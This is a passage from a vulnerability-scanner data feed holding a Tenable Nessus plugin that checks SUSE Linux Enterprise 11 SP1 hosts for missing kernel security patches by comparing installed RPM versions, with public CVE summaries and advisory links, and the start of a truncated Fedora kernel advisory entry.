\"CVE-2010-4157\", \"CVE-2010-4158\", \"CVE-2010-4160\", \"CVE-2010-4162\", \"CVE-2010-4163\", \"CVE-2010-4164\", \"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4175\", \"CVE-2010-4258\");\n\n script_name(english:\"SuSE 11.1 Security Update : Linux kernel (SAT Patch Numbers 3760 / 3762 / 3763)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 11 Service Pack 1 kernel was updated to\n2.6.32.27 and fixes various bugs and security issues.\n\nThe following security issues were fixed :\n\n - A local attacker could use a Oops (kernel crash) caused\n by other flaws to write a 0 byte to a attacker\n controlled address in the kernel. This could lead to\n privilege escalation together with other issues.\n (CVE-2010-4258)\n\n - A overflow in sendto() and recvfrom() routines was fixed\n that could be used by local attackers to potentially\n crash the kernel using some socket families like L2TP.\n (CVE-2010-4160)\n\n - A 32bit vs 64bit integer mismatch in gdth_ioctl_alloc\n could lead to memory corruption in the GDTH driver.\n (CVE-2010-4157)\n\n - The do_tcp_setsockopt function in net/ipv4/tcp.c in the\n Linux kernel did not properly restrict TCP_MAXSEG (aka\n MSS) values, which allowed local users to cause a denial\n of service (OOPS) via a setsockopt call that specifies a\n small value, leading to a divide-by-zero error or\n incorrect use of a signed integer. (CVE-2010-4165)\n\n - A remote (or local) attacker communicating over X.25\n could cause a kernel panic by attempting to negotiate\n malformed facilities. (CVE-2010-4164)\n\n - A local attacker could cause memory overruns in the RDS\n protocol stack, potentially crashing the kernel. So far\n it is considered not to be exploitable. (CVE-2010-4175)\n\n - Use-after-free vulnerability in mm/mprotect.c in the\n Linux kernel allwed local users to cause a denial of\n service via vectors involving an mprotect system call.\n (CVE-2010-4169)\n\n - A minor heap overflow in the CAN network module was\n fixed. Due to nature of the memory allocator it is\n likely not exploitable. (CVE-2010-3874)\n\n - A memory information leak in berkely packet filter rules\n allowed local attackers to read uninitialized memory of\n the kernel stack. (CVE-2010-4158)\n\n - A local denial of service in the blockdevice layer was\n fixed. (CVE-2010-4162)\n\n - By submitting certain I/O requests with 0 length, a\n local user could have caused a kernel panic.\n (CVE-2010-4163)\n\n - The ethtool_get_rxnfc function in net/core/ethtool.c in\n the Linux kernel did not initialize a certain block of\n heap memory, which allowed local users to obtain\n potentially sensitive information via an\n ETHTOOL_GRXCLSRLALL ethtool command with a large\n info.rule_cnt value. (CVE-2010-3861)\n\n - arch/x86/kvm/x86.c in the Linux kernel did not\n initialize certain structure members, which allowed\n local users to obtain potentially sensitive information\n from kernel stack memory via read operations on the\n /dev/kvm device. (CVE-2010-3881)\n\n - A range checking overflow in pktcdvd ioctl was fixed.\n (CVE-2010-3437)\n\n - The viafb_ioctl_get_viafb_info function in\n drivers/video/via/ioctl.c in the Linux kernel did not\n properly initialize a certain structure member, which\n allowed local users to obtain potentially sensitive\n information from kernel stack memory via a\n VIAFB_GET_INFO ioctl call. (CVE-2010-4082)\n\n - The ipc subsystem in the Linux kernel did not initialize\n certain structures, which allowed local users to obtain\n potentially sensitive information from kernel stack\n memory via vectors related to the (1) compat_sys_semctl,\n (2) compat_sys_msgctl, and (3) compat_sys_shmctl\n functions in ipc/compat.c; and the (4)\n compat_sys_mq_open and (5) compat_sys_mq_getsetattr\n functions in ipc/compat_mq.c. (CVE-2010-4073)\n\n - The copy_shmid_to_user function in ipc/shm.c in the\n Linux kernel did not initialize a certain structure,\n which allowed local users to obtain potentially\n sensitive information from kernel stack memory via\n vectors related to the shmctl system call and the 'old\n shm interface.'. (CVE-2010-4072)\n\n - The copy_semid_to_user function in ipc/sem.c in the\n Linux kernel did not initialize a certain structure,\n which allowed local users to obtain potentially\n sensitive information from kernel stack memory via a (1)\n IPC_INFO, (2) SEM_INFO, (3) IPC_STAT, or (4) SEM_STAT\n command in a semctl system call. (CVE-2010-4083)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=595215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=602838\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=615630\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=628180\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=636672\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=637542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=638258\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=639803\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=640878\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=641105\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=641811\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642043\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642313\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642314\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642486\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=643173\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=643477\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=645659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=646226\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=646542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=646702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=646908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=647567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=648112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=648701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=649187\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=649548\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=650067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=650185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=650487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=650748\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=651066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=651218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=651596\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=652024\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=652293\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=652563\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=652603\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=652842\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=652939\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=652940\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=652945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=653148\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=653258\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=653260\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=653266\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=653800\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=653930\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=654150\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=654530\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=654581\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=654701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=654837\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=654967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=655027\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=655278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=656471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=657324\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=657350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=657412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=657415\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=657976\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=658464\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=658829\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=659144\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3437.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3861.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3881.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4072.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4073.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4082.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4083.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4157.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4158.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4160.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4162.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4163.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4164.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4165.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4169.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4175.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4258.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 3760 / 3762 / 3763 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:btrfs-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:btrfs-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:btrfs-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ext4dev-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ext4dev-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ext4dev-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:hyper-v-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:hyper-v-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-pae-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-xen-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"btrfs-kmp-default-0_2.6.32.27_0.2-0.3.29\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"btrfs-kmp-pae-0_2.6.32.27_0.2-0.3.29\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"btrfs-kmp-xen-0_2.6.32.27_0.2-0.3.29\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"hyper-v-kmp-default-0_2.6.32.27_0.2-0.8.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"hyper-v-kmp-pae-0_2.6.32.27_0.2-0.8.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-default-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-default-base-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-default-devel-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-default-extra-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-desktop-devel-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-pae-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-pae-base-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-pae-devel-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-pae-extra-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-source-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-syms-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-xen-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-xen-base-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-xen-devel-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-xen-extra-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"btrfs-kmp-default-0_2.6.32.27_0.2-0.3.29\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"btrfs-kmp-xen-0_2.6.32.27_0.2-0.3.29\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"hyper-v-kmp-default-0_2.6.32.27_0.2-0.8.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-default-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-default-base-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-default-devel-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-default-extra-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-desktop-devel-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-source-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-syms-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-base-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-extra-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"btrfs-kmp-default-0_2.6.32.27_0.2-0.3.29\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"ext4dev-kmp-default-0_2.6.32.27_0.2-7.3.29\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"kernel-default-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"kernel-default-base-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"kernel-default-devel-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"kernel-source-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"kernel-syms-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"kernel-trace-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"kernel-trace-base-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"kernel-trace-devel-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"btrfs-kmp-pae-0_2.6.32.27_0.2-0.3.29\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"btrfs-kmp-xen-0_2.6.32.27_0.2-0.3.29\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"ext4dev-kmp-pae-0_2.6.32.27_0.2-7.3.29\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"ext4dev-kmp-xen-0_2.6.32.27_0.2-7.3.29\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"hyper-v-kmp-default-0_2.6.32.27_0.2-0.8.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"hyper-v-kmp-pae-0_2.6.32.27_0.2-0.8.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"kernel-ec2-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"kernel-ec2-base-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"kernel-pae-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"kernel-pae-base-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"kernel-pae-devel-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"kernel-xen-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"kernel-xen-base-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"kernel-xen-devel-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"kernel-default-man-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"btrfs-kmp-xen-0_2.6.32.27_0.2-0.3.29\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"ext4dev-kmp-xen-0_2.6.32.27_0.2-7.3.29\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"hyper-v-kmp-default-0_2.6.32.27_0.2-0.8.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"kernel-ec2-2.6.32.27-0.2.4\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"kernel-ec2-base-2.6.32.27-0.2.4\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-base-2.6.32.27-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.32.27-0.2.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:09:07", "description": "Update to kernel 2.6.35.11:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/longterm/v2.6.35/ChangeLog\n-2.6.35.11\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2011-02-11T00:00:00", "title": "Fedora 14 : kernel-2.6.35.11-83.fc14 (2011-1138)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0521", "CVE-2010-4163", "CVE-2010-4668", "CVE-2010-4165", "CVE-2010-4346", "CVE-2010-4649", "CVE-2011-0006", "CVE-2010-4648"], "modified": "2011-02-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:14"], "id": 